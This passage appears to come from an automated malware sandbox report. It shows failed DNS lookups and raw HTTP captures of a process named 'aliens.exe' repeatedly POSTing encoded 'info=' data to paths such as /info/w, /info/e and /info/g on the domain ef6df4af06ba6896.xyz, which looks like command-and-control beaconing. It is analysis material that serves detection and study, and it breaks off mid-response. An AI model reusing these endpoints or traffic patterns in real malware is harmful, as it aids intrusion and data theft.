                                                                                                                                                  Dec 5, 2020 08:45:11.169487953 CET8.8.8.8192.168.2.30x6263Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:11.703306913 CET8.8.8.8192.168.2.30xfa98Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:12.233783007 CET8.8.8.8192.168.2.30xeaa4Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:12.765013933 CET8.8.8.8192.168.2.30x9141Name error (3)relay.phub.hz.sandai.netnonenoneA (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • ef6df4af06ba6896.xyz

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.349734104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:41:53.420881033 CET3365OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 93
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:41:53.420972109 CET3365OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 66 43 34 4d 6d 78 65 6f 75 42 36 59 55 39 41 58 6c 30 34 51 4d 37 4d 7a
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwfC4MmxeouB6YU9AXl04QM7MzC4zd7fupg~~
                                                                                                                                                  Dec 5, 2020 08:41:54.931421995 CET3953INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:41:54 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d3191a04f8f38c100d0b46620e75b327c1607154113; expires=Mon, 04-Jan-21 07:41:53 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d372b3990000277ca4227000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2FNND8WD06qx2ncRgj9CRTVDspo%2BlEch2GC4MN3p1JgozU3HRf7yd5WHlDmaYd%2Fl%2FB3tStd9tD4nPteb898VvVWUCO3HHptF10wzSo%2Bfm%2BmfgaaJkFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2098f80a277c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:41:55.029978037 CET3954OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 93
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:41:55.030023098 CET3954OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 51 67 42 36 51 6e 2d 32 54 51 62 4e 73 52 42 4a 62 66 74 68 5a 32 4c 44
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwQgB6Qn-2TQbNsRBJbfthZ2LDs3NzMbcYA~~
                                                                                                                                                  Dec 5, 2020 08:41:57.531936884 CET3956INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:41:57 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=dfceae49fb62e0c4be3fefcb3f99721771607154115; expires=Mon, 04-Jan-21 07:41:55 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d372b9e20000277cda1e7000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=55fUzXMWEMnu9jdKhSwu4SNE6fASr92DHBis7Bi%2BJjmsFynFy%2BGH%2BdEqMFX2eyXsxNxfwLurNS7BiMrdr4HC46l7lt%2BeuzvmLs1ekBkdZpTa4P1QOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc20a30e30277c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.349738104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:42:48.140707016 CET4256OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:42:48.140763044 CET4256OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 54 36 50 4c 5f 4a 46 63 65 4f 4e 6c 70 4d 53 36 63 69 50 56 4a 55 7e
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwT6PL_JFceONlpMS6ciPVJU~
                                                                                                                                                  Dec 5, 2020 08:42:52.078556061 CET4257INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:42:52 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d61870f397e3c2ce34e912cd445b0feca1607154168; expires=Mon, 04-Jan-21 07:42:48 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d3738958000041200987c000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Kbh7wCU69xHKSj5slB3Ixlf%2BlI%2Bkta8%2BVyHpBzoQukpdtqhySnLLObExlSeVadJDommJwsCmm88a8DEICmfNxX6lWmKCmEiSkliGiqg%2FPFWvp2TS3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc21eefc414120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:42:57.924711943 CET4258OUTPOST /info/e HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 677
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:42:57.924752951 CET4259OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 6c 35 2d 55 57 4f 59 52 6d 51 33 41 37 56 79 73 73 34 56 62 54 39 47 6b 32 74 34 57 6c 5a 69 73 4c 31 50 75 6e 30 33 4f 6c 66 46 64 42 54 72 63 57 4b 35 61 74 32 52 35 53 6a 35 63 65 67 79 59 54 72
                                                                                                                                                  Data Ascii: info=4u25ymXISBzl5-UWOYRmQ3A7Vyss4VbT9Gk2t4WlZisL1Pun03OlfFdBTrcWK5at2R5Sj5cegyYTrXh_i27RClU2ZAIhPnCK1_D8HJzHV1DSN5LMuDmcH38Qz_7YhlW3Ps9ZkkTht4BlXbMe_vdgrkAB71E3HurhmS4Tsfw0uZAR2uzBNHtAjCFZ9hSib4qa0Sd0WGXMtwiOHHlW11dtDCkD7G5PdQOnrk2ljxNquS6C9O
                                                                                                                                                  Dec 5, 2020 08:42:59.278107882 CET4259INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:42:59 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d696391eb5a20a19c3eb6a572057a66cd1607154177; expires=Mon, 04-Jan-21 07:42:57 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373af9100004120ce08e000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YwISspKcmN7Y405nkM4isjNKKK2Zb1DmWM8IippHWMqcmFi%2BAhA%2BfSO%2BKmOt9cCLMwDPBrKuY6oVMVhU5RxZOEpIKoMOQzLB1b2yPEW6SxmTWFVahw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc222c1a814120-PRG
                                                                                                                                                  Data Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                  Data Ascii: 11
                                                                                                                                                  Dec 5, 2020 08:42:59.278158903 CET4260INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:42:59.316557884 CET4260OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:42:59.316618919 CET4260OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 65 53 52 47 70 7a 37 61 53 72 65 66 69 64 71 63 73 38 62 73 51 4d 7e
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKweSRGpz7aSrefidqcs8bsQM~
                                                                                                                                                  Dec 5, 2020 08:43:02.855652094 CET4262INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:02 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=dd93d0f420e7a6c60eb5dae47e64e84391607154179; expires=Mon, 04-Jan-21 07:42:59 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373b50000004120fda51000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3zvH0rPrkWrkKbxJeXAIVNMngRqjD7U9LanAYk0q7BjdF%2B5y2tc9VnF%2FPENZRbiTGQUkJ%2BFNu5qcXVcw6lPPG%2BrnXOSa6gLFLXk%2FeIqWX5%2B%2Bq2tbQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2234cf8a4120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:03.095493078 CET4262OUTPOST /info/g HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 1405
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:03.095556974 CET4264OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 6c 35 2d 55 57 4f 59 52 6d 51 33 41 37 56 79 73 73 34 56 62 54 39 47 6b 32 74 34 57 6c 5a 69 73 4c 31 50 75 6e 30 33 4f 6c 66 46 64 42 54 72 63 57 4b 35 61 74 32 52 35 53 6a 35 63 65 67 79 59 54 72
                                                                                                                                                  Data Ascii: info=4u25ymXISBzl5-UWOYRmQ3A7Vyss4VbT9Gk2t4WlZisL1Pun03OlfFdBTrcWK5at2R5Sj5cegyYTrXh_i27RClU2ZAIhPnCK1_D8HJzHV1A4l-31NtENxckAMFpcTKc9NyeUnv9d_b3PLjg0nriNgW_0RR5pas3umehdL3eOs8mU3yF25PcPNh6FlTSUxbahmpKFEafMchQLH11aEvmUmK2-DTZU0i1ZbSzpAob4T8u18J
                                                                                                                                                  Dec 5, 2020 08:43:04.337274075 CET4265INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:04 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d111cdcac6d047e629428e7b4c99708761607154183; expires=Mon, 04-Jan-21 07:43:03 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373c3dd00004120f801f000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zv7DK1KDGTiyLMdaPnp0rxO8Mqva%2BBSUPFmxm7%2FirxdEYXzpKXfzH51PewZ8vLW5z2UM2T06U%2FtlrdEk9y4BfI7sLA3vT5Wc1N9FVu2DuL2j0ZSDEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc224c7bce4120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:04.348758936 CET4266OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:04.348802090 CET4266OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 58 61 32 75 79 39 70 59 70 4d 62 41 5a 36 54 49 59 2d 75 79 51 59 7e
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwXa2uy9pYpMbAZ6TIY-uyQY~
                                                                                                                                                  Dec 5, 2020 08:43:07.258394003 CET4267INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:07 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d8d9d37752442a3b202bea83cb00d4f8c1607154184; expires=Mon, 04-Jan-21 07:43:04 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373c8a900004120d81f9000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ETZjUdcpCwC%2BZivTgIHk0X22ERLHufV0Eehw%2FhiFdX8nDMv%2FDK8jQfx1TSKN0LTxWJb%2ByK%2FFVxDwJXLqE7qMtkvhzZ5QcGyRi35%2BlabW%2BOAK%2B6jZ7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc225448194120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:07.292275906 CET4267OUTGET /info/r HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:08.427812099 CET4268INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:08 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d0cd7da8d808be268c8436cfafaea59c31607154187; expires=Mon, 04-Jan-21 07:43:07 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373d42800004120d8aae000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VSlmuNTBv7okEoCH4i32AqgNsMk48HhR%2FzV0NK4M4bGJoIQpVkqtZXWyQBfsJtJKoy%2F3GhzrbfNMoFqGSsCS1QtSl3kuAl60M5S%2FTOp%2FxQk%2FKOJ8DA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2266abb64120-PRG
                                                                                                                                                  Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a
                                                                                                                                                  Data Ascii: c6mtnVXGhd10~
                                                                                                                                                  Dec 5, 2020 08:43:08.427855015 CET4268INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:30.096564054 CET4276OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:30.097744942 CET4276OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 58 6b 67 75 2d 4e 34 42 32 77 30 66 34 32 45 52 50 5f 5a 69 33 73 7e
                                                                                                                                                  Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwXkgu-N4B2w0f42ERP_Zi3s~
                                                                                                                                                  Dec 5, 2020 08:43:34.401576996 CET4279INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:34 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d410e765879973c765abf01de61c2fa491607154210; expires=Mon, 04-Jan-21 07:43:30 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d3742d3d000041203d8a5000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YToItkX0sS8Vefjg5Y4oykJAC5lYUzPoLhWw376XPEfrTfOTze7li9lzAxyMQzPzzYfQ%2FGxqd%2BTVLracm4fbptQWlv4HGRKTeoKkg6Rs5ZK1wD1oFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc22f529e34120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:57.305152893 CET7827OUTPOST /info/du HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 125
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:57.305206060 CET7827OUTData Raw: 69 6e 66 6f 3d 75 6d 66 36 77 4e 6f 6f 62 77 4a 74 48 32 64 44 5f 39 44 45 78 58 5f 57 34 59 6c 46 30 38 6f 61 62 6f 68 7a 4a 35 75 38 30 79 76 39 79 6b 59 77 6f 63 32 68 4c 56 36 52 30 51 4a 48 36 34 37 52 43 53 35 4f 5f 6c 47 6b 52 55 62 54 6a
                                                                                                                                                  Data Ascii: info=umf6wNoobwJtH2dD_9DExX_W4YlF08oabohzJ5u80yv9ykYwoc2hLV6R0QJH647RCS5O_lGkRUbTjowAOG4IowICzhDH8RfZMVomBI_1-Su_adRIuLRX7Q~~
                                                                                                                                                  Dec 5, 2020 08:43:58.680834055 CET7843INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:58 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d911a86354a154f4d45bff8c6f16ad1131607154237; expires=Mon, 04-Jan-21 07:43:57 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
